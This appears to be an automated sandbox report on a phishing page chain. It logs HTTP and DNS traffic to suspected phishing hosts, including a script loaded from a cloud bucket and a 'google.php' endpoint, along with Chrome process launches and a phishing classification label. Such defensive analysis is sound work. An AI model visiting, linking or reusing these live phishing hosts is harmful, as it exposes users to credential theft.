      Source: global trafficHTTP traffic detected: GET /gh/pranaynamnaik/files@latest/micro-123787483.png HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://qbauyd.celestialjourney.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://qbauyd.celestialjourney.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /gh/pranaynamnaik/files@latest/micro-123787483.png HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://qbauyd.celestialjourney.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/xj99j/0x4AAAAAAA_VMp1Xe4VpAjMq/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://qbauyd.celestialjourney.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=91ed34197bf04c24&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/xj99j/0x4AAAAAAA_VMp1Xe4VpAjMq/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/xj99j/0x4AAAAAAA_VMp1Xe4VpAjMq/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/191728647:1741717137:7lLq_BD-QmjVGuY008eq899TlErzNbNFPfyujc2wyPM/91ed34197bf04c24/YK5bWdVcUdmtnYTPkpgjd1tV4jPgoLw8Z2AZJuMny_E-1741718670-1.1.1.1-X9oIxqfQmwq2VLgNfu0DvnnKKUi30IhilZPl11qMY755gRBUyY4Gkpg59K3PSmiV HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/91ed34197bf04c24/1741718675462/fegFnYsJtl9wN8o HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/xj99j/0x4AAAAAAA_VMp1Xe4VpAjMq/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/91ed34197bf04c24/1741718675462/fegFnYsJtl9wN8o HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/91ed34197bf04c24/1741718675466/33670cd6777d70553e154da7844cb15bf1c4001679e0d164563ee0b0f83ab9ab/C3uF7IdsU1RK7Qj HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/xj99j/0x4AAAAAAA_VMp1Xe4VpAjMq/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/191728647:1741717137:7lLq_BD-QmjVGuY008eq899TlErzNbNFPfyujc2wyPM/91ed34197bf04c24/YK5bWdVcUdmtnYTPkpgjd1tV4jPgoLw8Z2AZJuMny_E-1741718670-1.1.1.1-X9oIxqfQmwq2VLgNfu0DvnnKKUi30IhilZPl11qMY755gRBUyY4Gkpg59K3PSmiV HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/191728647:1741717137:7lLq_BD-QmjVGuY008eq899TlErzNbNFPfyujc2wyPM/91ed34197bf04c24/YK5bWdVcUdmtnYTPkpgjd1tV4jPgoLw8Z2AZJuMny_E-1741718670-1.1.1.1-X9oIxqfQmwq2VLgNfu0DvnnKKUi30IhilZPl11qMY755gRBUyY4Gkpg59K3PSmiV HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://qbauyd.celestialjourney.it.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://qbauyd.celestialjourney.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveOrigin: https://qbauyd.celestialjourney.it.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://qbauyd.celestialjourney.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap.min.js HTTP/1.1Host: 6068815810-1317754460.cos.ap-bangkok.myqcloud.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://qbauyd.celestialjourney.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: 6068815810.sbsConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: 6068815810.sbsConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficDNS traffic detected: DNS query: site-xtxg5.powerappsportals.com
      Source: global trafficDNS traffic detected: DNS query: content.powerapps.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: docdro.id
      Source: global trafficDNS traffic detected: DNS query: www.docdroid.com
      Source: global trafficDNS traffic detected: DNS query: s.lunaweb.cloud
      Source: global trafficDNS traffic detected: DNS query: qbauyd.celestialjourney.it.com
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: 6068815810-1317754460.cos.ap-bangkok.myqcloud.com
      Source: global trafficDNS traffic detected: DNS query: 6068815810.sbs
      Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
      Source: unknownHTTP traffic detected: POST /api/event HTTP/1.1Host: s.lunaweb.cloudConnection: keep-aliveContent-Length: 171sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plainsec-ch-ua-mobile: ?0Accept: */*Origin: https://www.docdroid.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.docdroid.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 23.60.203.209:443 -> 192.168.2.16:49742 version: TLS 1.2
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6872_976597568
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6872_976597568
      Source: classification engineClassification label: mal64.phis.win@27/55@52/235
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,7028593152666809667,3027904216886136172,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2072 /prefetch:3
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://site-xtxg5.powerappsportals.com/"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,7028593152666809667,3027904216886136172,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2072 /prefetch:3
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
